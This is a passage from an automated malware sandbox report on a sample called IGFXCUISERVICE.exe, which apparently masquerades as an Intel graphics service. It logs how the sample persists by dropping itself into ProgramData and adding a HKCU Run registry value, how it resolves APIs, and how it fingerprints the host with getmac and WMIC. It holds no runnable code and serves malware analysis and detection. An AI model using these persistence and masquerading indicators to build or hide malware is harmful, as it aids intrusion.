Source: IGFXCUISERVICE.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeCode function: 1_2_012E5E0B push ecx; ret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07A9C277 push cs; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07A9E149 push ss; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07A9BAE9 push cs; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07A9EAE0 push ds; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07A9EAE3 push ds; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07A9B988 push es; retf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07AFFD28 push eax; mov dword ptr [esp], edx
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002B5234 push ecx; ret
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002D5E0B push ecx; ret

Persistence and Installation Behavior:

barindex
Uses cmd line tools excessively to alter registry or file dataShow sources
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\conhost.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\SystemData\igfxCUIService.exeJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\SystemData\igfxCUIService.exeJump to dropped file
Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run igfxCUIService
Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run igfxCUIService
Source: C:\ProgramData\SystemData\igfxCUIService.exeCode function: 5_2_002B60A8 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\SystemData\igfxCUIService.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\getmac.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\getmac.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
